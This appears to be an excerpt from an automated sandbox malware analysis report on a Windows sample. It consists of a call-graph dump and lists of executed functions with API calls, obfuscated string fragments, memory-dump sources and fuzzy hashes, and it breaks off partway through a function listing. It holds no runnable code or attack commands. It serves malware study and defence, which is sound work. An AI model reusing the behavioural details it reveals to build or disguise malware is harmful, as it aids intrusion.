ExitProcess RtlAllocateHeap RtlFreeHeap 77676->77696 77677 93c50 4 API calls 77677->77696 77678->77316 77679 10ce31 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap std::_Facet_Register 77679->77696 77680 979e0 4 API calls 77680->77696 77681 44540 14 API calls 77681->77696 77682 99ec0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77682->77696 77683 f27b0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77683->77696 77684 93230 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77684->77696 77685 44970 10 API calls 77685->77696 77688 cbfb0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77688->77696 77689 32830 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77689->77696 77690 99c70 4 API calls 77690->77696 77691 95b20 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77691->77696 77692 bda80 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77692->77696 77693 97810 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77693->77696 77694 11a9d6 4 API calls 77694->77696 77695 93510 4 API calls 77695->77696 77696->77650 77696->77657 77696->77665 77696->77669 77696->77670 77696->77671 77696->77672 77696->77673 77696->77674 77696->77675 77696->77676 77696->77677 77696->77679 77696->77680 77696->77681 77696->77682 77696->77683 77696->77684 77696->77685 77696->77688 77696->77689 77696->77690 77696->77691 77696->77692 77696->77693 77696->77694 77696->77695 77697 cf0e0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77696->77697 77707 4d40bd4 BaseDllReadWriteIniFile 77696->77707 77708 4d40be4 BaseDllReadWriteIniFile 77696->77708 77709 4d40ba5 BaseDllReadWriteIniFile 77696->77709 77710 4d40b67 BaseDllReadWriteIniFile 77696->77710 77711 4d40ae2 BaseDllReadWriteIniFile 77696->77711 77712 4d40bf2 BaseDllReadWriteIniFile 77696->77712 77713 4d40b13 BaseDllReadWriteIniFile 77696->77713 77714 4d40b2e BaseDllReadWriteIniFile 77696->77714 77715 4d40b78 BaseDllReadWriteIniFile 77696->77715 77716 4d40bfa BaseDllReadWriteIniFile 77696->77716 77717 4d40b4b BaseDllReadWriteIniFile 77696->77717 77861 cdee0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77696->77861 77862 ce0f0 RtlAllocateHeap RtlAllocateHeap RtlFreeHeap 77696->77862 77697->77696 77698->77696 77699->77696 77700->77696 77701->77696 77702->77696 77703->77696 77704->77696 77705->77696 77706->77696 77707->77696 77708->77696 77709->77696 77710->77696 77711->77696 77712->77696 77713->77696 77714->77696 77715->77696 77716->77696 77717->77696 77719 4d90e98 GetPrivateProfileStringA 77718->77719 77721 4d90f82 77719->77721 77721->77385 77723 4d90e94 GetPrivateProfileStringA 77722->77723 77725 4d90f82 77723->77725 77725->77385 77727 4d90f4d GetPrivateProfileStringA 77726->77727 77728 4d90f75 77726->77728 77727->77728 77728->77385 77731 4d90e94 GetPrivateProfileStringA 77730->77731 77733 4d90f82 77731->77733 77733->77385 77735 4d90efe GetPrivateProfileStringA 77734->77735 77737 4d90f82 77735->77737 77737->77385 77739 4d90e22 77738->77739 77740 4d90e86 GetPrivateProfileStringA 77738->77740 77739->77385 77742 4d90f82 77740->77742 77742->77385 77744 4d90ea8 GetPrivateProfileStringA 77743->77744 77746 4d90f82 77744->77746 77746->77385 77748 4d90e60 77747->77748 77750 4d90eac GetPrivateProfileStringA 77747->77750 77749 4d90e85 GetPrivateProfileStringA 77748->77749 77751 4d90e7a 77749->77751 77753 4d90f82 77750->77753 77753->77385 77755 4d90f5a GetPrivateProfileStringA 77754->77755 77756 4d90f82 77755->77756 77756->77385 77758 11a6e5 77757->77758 77759 11a69d 77757->77759 77824 11a6fb 4 API calls 3 library calls 77758->77824 77760 11a6a3 77759->77760 77764 11a6c0 77759->77764 77820 11addf RtlAllocateHeap RtlFreeHeap __dosmaperr 77760->77820 77762 11a6b3 77762->77385 77770 11a6de 77764->77770 77822 11addf RtlAllocateHeap RtlFreeHeap __dosmaperr 77764->77822 77765 11a6a8 77821 112340 ExitProcess RtlAllocateHeap RtlFreeHeap __fread_nolock 77765->77821 77768 11a6cf 77823 112340 ExitProcess RtlAllocateHeap RtlFreeHeap __fread_nolock 77768->77823 77770->77385 77772 4d40af3 BaseDllReadWriteIniFile 77771->77772 77774 4d40c2a 77772->77774 77776 4d40b41 BaseDllReadWriteIniFile 77775->77776 77778 4d40c2a 77776->77778 77780 4d40b7e BaseDllReadWriteIniFile 77779->77780 77782 4d40c2a 77780->77782 77784 4d40bba BaseDllReadWriteIniFile 77783->77784 77786 4d40c2a 77784->77786 77788 4d40bfe BaseDllReadWriteIniFile 77787->77788 77790 4d40c2a 77788->77790 77792 4d40b5e BaseDllReadWriteIniFile 77791->77792 77794 4d40c2a 77792->77794 77796 4d40b1a BaseDllReadWriteIniFile 77795->77796 77798 4d40c2a 77796->77798 77800 4d40c0f BaseDllReadWriteIniFile 77799->77800 77801 4d40c2a 77800->77801 77803 4d40af3 BaseDllReadWriteIniFile 77802->77803 77805 4d40c2a 77803->77805 77807 4d40c03 BaseDllReadWriteIniFile 77806->77807 77809 4d40c2a 77807->77809 77811 4d40bba BaseDllReadWriteIniFile 77810->77811 77813 4d40c2a 77811->77813 77815 f27b0 3 API calls 77814->77815 77816 f2903 77815->77816 77816->77385 77817->77385 77818->77385 77819->77349 77820->77765 77821->77762 77822->77768 77823->77762 77824->77762 77831 97a10 77825->77831 77826 97ac9 77855 37d60 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 77826->77855 77827 97a4e 77829 10ce31 std::_Facet_Register 4 API calls 77827->77829 77832 97a68 77829->77832 77830 97ace 77831->77826 77831->77827 77834 97a94 77831->77834 77833 95e10 4 API calls 77832->77833 77835 97a82 77833->77835 77834->77464 77836 97810 4 API calls 77835->77836 77836->77834 77838 93568 77837->77838 77839 93535 77837->77839 77841 935a8 77838->77841 77842 9358a 77838->77842 77840 10ce31 std::_Facet_Register 4 API calls 77839->77840 77843 9353f 77840->77843 77847 32700 4 API calls 77841->77847 77844 979e0 4 API calls 77842->77844 77845 10ce31 std::_Facet_Register 4 API calls 77843->77845 77846 93595 77844->77846 77845->77838 77846->77464 77848 935b8 77847->77848 77849 99c70 4 API calls 77848->77849 77850 935cd 77849->77850 77851 38920 4 API calls 77850->77851 77852 935e2 Concurrency::cancel_current_task 77851->77852 77852->77464 77853->77464 77854->77464 77855->77830 77856->77548 77857->77548 77859->77621 77860->77621 77861->77696 77862->77696 77863 12002b 77866 11fd77 77863->77866 77865 12005c 77867 11fd83 __fread_nolock std::_Lockit::_Lockit 77866->77867 77870 11fdd2 77867->77870 77869 11fd9e 77869->77865 77871 11fded 77870->77871 77872 11fe60 std::_Lockit::_Lockit 77870->77872 77871->77872 77873 11fe40 77871->77873 77880 12becc 77871->77880 77872->77869 77873->77872 77875 12becc 4 API calls 77873->77875 77876 11fe56 77875->77876 77878 124953 __freea 2 API calls 77876->77878 77877 11fe36 77879 124953 __freea 2 API calls 77877->77879 77878->77872 77879->77873 77881 12bef4 77880->77881 77882 12bed9 77880->77882 77884 12bf03 77881->77884 77899 1319b8 ExitProcess RtlAllocateHeap RtlFreeHeap __fread_nolock __dosmaperr 77881->77899 77882->77881 77883 12bee5 77882->77883 77898 11addf RtlAllocateHeap RtlFreeHeap __dosmaperr 77883->77898 77889 125331 77884->77889 77887 12beea __fread_nolock 77887->77877 77890 125349 77889->77890 77891 12533e 77889->77891 77893 125351 77890->77893 77897 12535a __dosmaperr std::_Facet_Register 77890->77897 77892 1249cd std::_Locinfo::_Locinfo_ctor 3 API calls 77891->77892 77896 125346 77892->77896 77894 124953 __freea 2 API calls 77893->77894 77894->77896 77896->77887 77897->77896 77900 11addf RtlAllocateHeap RtlFreeHeap __dosmaperr 77897->77900 77898->77887 77899->77884 77900->77896 77901 9c4d0 77902 9c4fd 77901->77902 77903 9c4d7 77901->77903 77903->77902 77904 112350 3 API calls 77903->77904 77905 98000 77904->77905 77906 9b180 4 API calls 77905->77906 77908 9804c 77905->77908 77907 98013 77906->77907 77907->77908 77909 112350 3 API calls 77907->77909 77910 98074 77909->77910 77921 33b70 4 API calls 2 library calls 77910->77921 77912 98121 77913 10ce31 std::_Facet_Register 4 API calls 77912->77913 77914 98128 77913->77914 77915 10bc3e std::locale::_Init 4 API calls 77914->77915 77916 9813b 77915->77916 77922 995e0 5 API calls 4 library calls 77916->77922 77918 9816e 77919 981b2 77918->77919 77923 33b70 4 API calls 2 library calls 77918->77923 77921->77912 77922->77918 77923->77919

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 00072010 Relevance: 267.0, APIs: 22, Strings: 129, Instructions: 2735COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 000722E0
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0007233C
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00072CE3
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00072EBA
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00073074
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00073257
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0007353E
                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0007236D
                                                                                                                                                                                      • Part of subcall function 0003BF90: GetFileAttributesA.KERNEL32 ref: 0003BFBE
                                                                                                                                                                                      • Part of subcall function 0003BF90: __Mtx_unlock.LIBCPMT ref: 0003BFEE
                                                                                                                                                                                      • Part of subcall function 00095E10: Concurrency::cancel_current_task.LIBCPMT ref: 00095EF7
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0007248E
                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 000724BD
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0007266D
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 000726CB
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0007287A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateDirectory$FolderPath$AttributesConcurrency::cancel_current_taskFileMtx_unlock
                                                                                                                                                                                    • String ID: AGC$\FR$$v3)$(='>$.)%9$8b96$?#?/$CWK[$DGGL$DYCZ$DYCZ$DYCZ$DYCZ$DYCZ$EC^\$EC^\$EMA$EMA$FICZ$FU_F$J@}$J@}$J@}$JBB$JNL]$JNL]$JNL]$J^nB$K% /$Ln#+$NO_O$NvDB$NvDB$OU\R$QORP$R\\T$T[OD$T\LK$XICI$Y\AK$[_CS$[_CS$[_CS$\XB^$]UQ[$^BNF$_CFK$_DH\$e.$ $fxyn$fxyn$fxyn$fxyn$fxyn$fxyn$fxyn$fxyn$fxyn$fxyn$fxyn$fxyn$fxyn$f|t$gm}~$jxl$jxl$jxl$jxl$jxl$jxl$jxl$jxl$jxl$jxl$jxl$jxl$jxl$kHKU$kKM_$kgjk$kqes$l\XW$r{lx$tJY^${IJI${IJI${IJI${IJI${IJI${KFD${KFD${KFD${KFD${KFD${LH^${LH^${LH^${MPu${[H\${[XF${[XF${[XF${\FR${_JR${aj{${aj{${dFI${dFI${dFI${d\D${e@D${eLY${jH^${jH^${mEO${n@F${n@F${nLK${oHG${o[E${x@N${{@M${{@M${{BS${{]O${|FR${|eK${~bh${~yd
                                                                                                                                                                                    • API String ID: 4270311917-2286779694
                                                                                                                                                                                    • Opcode ID: c2670601e3cf63952853a3f741c45ad92b08346faf5a9313bf63bf0dd7c6cfd7
                                                                                                                                                                                    • Instruction ID: eca16364ca51ccf57d974069b58b9bbd136843ada28ec9d380a8c5ff14342915
                                                                                                                                                                                    • Opcode Fuzzy Hash: c2670601e3cf63952853a3f741c45ad92b08346faf5a9313bf63bf0dd7c6cfd7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E438070D042589ADF26EB64CC56BEDB778AF21304F4441D8E44977283EB746B88CFA6
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00072250 Relevance: 265.0, APIs: 22, Strings: 128, Instructions: 2535COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 000722E0
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0007233C
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00072CE3
                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0007236D
                                                                                                                                                                                      • Part of subcall function 0003BF90: GetFileAttributesA.KERNEL32 ref: 0003BFBE
                                                                                                                                                                                      • Part of subcall function 0003BF90: __Mtx_unlock.LIBCPMT ref: 0003BFEE
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0007248E
                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 000724BD
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0007266D
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 000726CB
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0007287A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateDirectory$FolderPath$AttributesFileMtx_unlock
                                                                                                                                                                                    • String ID: AGC$\FR$$v3)$(='>$.)%9$8b96$?#?/$CWK[$DGGL$DYCZ$DYCZ$DYCZ$DYCZ$DYCZ$EC^\$EC^\$EMA$EMA$FICZ$FU_F$J@}$J@}$J@}$JBB$JNL]$JNL]$JNL]$J^nB$K% /$Ln#+$NO_O$NvDB$NvDB$OU\R$QORP$R\\T$T[OD$XICI$Y\AK$[_CS$[_CS$[_CS$\XB^$]UQ[$^BNF$_CFK$_DH\$e.$ $fxyn$fxyn$fxyn$fxyn$fxyn$fxyn$fxyn$fxyn$fxyn$fxyn$fxyn$fxyn$fxyn$f|t$gm}~$jxl$jxl$jxl$jxl$jxl$jxl$jxl$jxl$jxl$jxl$jxl$jxl$jxl$kHKU$kKM_$kgjk$kqes$l\XW$r{lx$tJY^${IJI${IJI${IJI${IJI${IJI${KFD${KFD${KFD${KFD${KFD${LH^${LH^${LH^${MPu${[H\${[XF${[XF${[XF${\FR${_JR${aj{${aj{${dFI${dFI${dFI${d\D${e@D${eLY${jH^${jH^${mEO${n@F${n@F${nLK${oHG${o[E${x@N${{@M${{@M${{BS${{]O${|FR${|eK${~bh${~yd
                                                                                                                                                                                    • API String ID: 2791087084-3272549629
                                                                                                                                                                                    • Opcode ID: 18ef2e1287a347a5b432af57ddd19a3f4d9746a596a03b698cf5877363d745f8
                                                                                                                                                                                    • Instruction ID: a9502faa90955fd0ce96c366d6e6c979730609729d6e187ebf0fc0245f58b996
                                                                                                                                                                                    • Opcode Fuzzy Hash: 18ef2e1287a347a5b432af57ddd19a3f4d9746a596a03b698cf5877363d745f8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F337E70C046589ADF26EB64CC56BEDB778AF21304F4441D8E44977293EB742B88CFA6
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00040580 Relevance: 229.6, APIs: 13, Strings: 116, Instructions: 3825COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,?), ref: 00040784
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 000407B2
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 000409DD
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 000409EC
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 00040D86
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 00040D96
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 00040F76
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 00040F85
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 000410C6
                                                                                                                                                                                      • Part of subcall function 0003BF90: GetFileAttributesA.KERNEL32 ref: 0003BFBE
                                                                                                                                                                                      • Part of subcall function 0003BF90: __Mtx_unlock.LIBCPMT ref: 0003BFEE
                                                                                                                                                                                      • Part of subcall function 00095E10: Concurrency::cancel_current_task.LIBCPMT ref: 00095EF7
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 000410D5
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0004126B
                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00041415
                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0004143C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Mtx_unlock$AttributesFileFolderPath$Concurrency::cancel_current_task
                                                                                                                                                                                    • String ID: @Y_$AsPA$BBNA$B|eq$CANC$CI_$CI_$CM_I$EC@G$EEYK$GIY]$HCD@$HCD@$HCD@$HCD@$HCD@$HCD@$HCD@$HX_A$HX_[$HX_[$J@}$J@}$J@}$J@}$J@}$J@}$JBNK$JOBG$L_X\$MUCF$NOBG$NTHJ$NTHJ$NTHJ$NTHJ$NTHJ$NTHJ$N^b$N^B$N^H[$OY^$S%51$SW^_$VTU_$WYIM$XJX]$[T\N$[T\N$[_CS$[_CS$[_CS$[_CS$[_CS$[_CS$^]WN$_EiA$_MAM$`GEN$aDFX$aZHD$aZLC$cGNO$cIZB$eA]I$ejxi$fFFD$gk\R$hCD@$hC_K$iIDO$jAGI$jMNK$kA]O$kMMM$kOXV$nFOC$nPJE$ngjE$sM[X$uMMN$wZ@G${J@^${_HF${_HF${aGN${aGN${aGN${aGN${aGN${aGN${bHR${bHR${dFI${dFI${dFI${dFI${dFI${dFI${eFD${e\F${i[G${i[G${i]E${j@D${j@^${kFC${mEO${mEO${mEO${mQE${m]B${o\K${o\K$}KHY$~ijE
                                                                                                                                                                                    • API String ID: 1290385620-1811292266
                                                                                                                                                                                    • Opcode ID: 0c1ed76c53d998250b275f975d2d0b51e62e30f5ccaaf0a6914cda5170bb133d
                                                                                                                                                                                    • Instruction ID: 8a0772e67859aa76bcd21728cfb65016da28d2208c9341b926c4fb13fac5caf2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c1ed76c53d998250b275f975d2d0b51e62e30f5ccaaf0a6914cda5170bb133d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C73E170D04258DADF15EB64CC55BEEBBB9AF11304F4441E8E44967283EB702B89CFA6
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000413C0 Relevance: 203.7, APIs: 2, Strings: 113, Instructions: 2459COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00041415
                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0004143C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FolderPath
                                                                                                                                                                                    • String ID: @Y_$AsPA$BBNA$B|eq$CANC$CI_$CI_$CM_I$EC@G$EEYK$HCD@$HCD@$HCD@$HCD@$HCD@$HCD@$HCD@$HX_A$HX_[$HX_[$J@}$J@}$J@}$J@}$J@}$J@}$JBNK$JOBG$L_X\$MUCF$NOBG$NTHJ$NTHJ$NTHJ$NTHJ$NTHJ$NTHJ$N^b$N^B$N^H[$OY^$S%51$SW^_$VTU_$WYIM$XJX]$[T\N$[T\N$[_CS$[_CS$[_CS$[_CS$[_CS$[_CS$^]WN$_EiA$_MAM$`GEN$aDFX$aZHD$aZLC$cGNO$cIZB$eA]I$ejxi$fFFD$gk\R$hCD@$hC_K$iIDO$jAGI$jMNK$kA]O$kMMM$kOXV$nFOC$nPJE$ngjE$sM[X$uMMN$wZ@G${J@^${aGN${aGN${aGN${aGN${aGN${aGN${bHR${bHR${dFI${dFI${dFI${dFI${dFI${dFI${eFD${e\F${i[G${i[G${i]E${j@D${j@^${kFC${mEO${mEO${mEO${mQE${m]B${o\K${o\K$}KHY$~ijE
                                                                                                                                                                                    • API String ID: 1514166925-4294870260
                                                                                                                                                                                    • Opcode ID: e388ea7a9831e393d1f5074a414f12808f12128b1c9d450efbdc86f155d030bf
                                                                                                                                                                                    • Instruction ID: bdab6d0969679635e36277aa8df1034fb22e3b84dd0432ae27f65074e5b1f2f4
                                                                                                                                                                                    • Opcode Fuzzy Hash: e388ea7a9831e393d1f5074a414f12808f12128b1c9d450efbdc86f155d030bf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C33C170D04658DADF16EB64CC167EDBBB9AF11304F4445D8E84967283EB742B88CFA2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000852B0 Relevance: 140.1, APIs: 11, Strings: 67, Instructions: 3585COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008643E
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008644D
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0008744F
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 000876BC
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 000876CB
